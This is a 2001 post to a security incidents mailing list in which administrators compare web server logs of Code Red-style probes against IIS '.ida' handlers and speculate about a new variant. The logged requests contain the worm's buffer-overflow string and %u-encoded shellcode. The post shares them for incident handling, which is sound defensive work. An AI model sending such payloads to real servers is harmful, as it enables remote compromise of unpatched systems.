RE: CRv3? Or some other ida type

From: Pat Moffitt (pmoffitt@wrv.com)
Date: 08/01/01


From: "Pat Moffitt" <pmoffitt@wrv.com>
To: <mike@msbnetworks.com>, <incidents@securityfocus.com>
Subject: RE: CRv3?  Or some other ida type
Date: Wed, 1 Aug 2001 09:35:07 -0700
Message-ID: <001501c11aa7$ec64e3a0$48bb42cf@mis1.wrv.com>

Here is what I have seen so far. Yes, does look like pairs but looks like
the same old get statement isn't it?

Have seen increased portscans for port 80 today.

64.23.82.33 - - [01/Aug/2001:07:44:29 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%
u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252

64.23.82.33 - - [01/Aug/2001:07:44:29 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%
u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252

193.89.247.134 - - [01/Aug/2001:07:58:05 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u81
90%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252

193.89.247.134 - - [01/Aug/2001:07:58:05 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u81
90%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252

Pat Moffitt
MIS Administrator
Western Recreational Vehicles, Inc.

> -----Original Message-----
> From: mike@msbnetworks.com [mailto:mike@msbnetworks.com]
> Sent: Tuesday, July 31, 2001 3:24 PM
> To: incidents@securityfocus.com
> Subject: CRv3? Or some other ida type
>
>
> So I've had my servers scanning for .ida probes
> (They're Apache - I'm just curious) Well, after
> 5PM EDT, I started to see a few probes that
> looked different than the Code Red probe
> (default.ida?NNN)
>
> Here's what I've seen so far:
>
> 136.176.193.XXX - - [31/Jul/2001:16:59:39 -
> 0400] "GET /x.ida?
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAA=X HTTP/1.1" 404 280 "-" "-"
>
> [somehost].bradley.edu - - [31/Jul/2001:17:11:24 -
> 0400] "GET /x.ida?
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAA=X HTTP/1.1" 404 211 "-" "-"
>
> The interesting thing is I'm getting probed twice
> by each host, about 2 minutes apart. Also, it
> must be doing random IP generation - I have
> servers on numerous sequential IPs, and I have
> not seen the probes mve from one IP to the next.
>
> The traffic has been light (less than 10 probes so
> far) but given its not even 8PM yet :) Just
> thought I'd post - this may be totally unrelated, but
> it might be CRv3 - so I figured I'd post.
>
> ------------------------------------------------------------------
> ----------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com



Relevant Pages

  • Re: CRv3? Or some other ida type
    ... Subject: CRv3? ... Or some other ida type ... > not seen the probes mve from one IP to the next. ... > and tracking system please see: http://aris.securityfocus.com ...
    (Incidents)
  • CRv3? Or some other ida type
    ... Subject: CRv3? ... Or some other ida type ... So I've had my servers scanning for .ida probes ...
    (Incidents)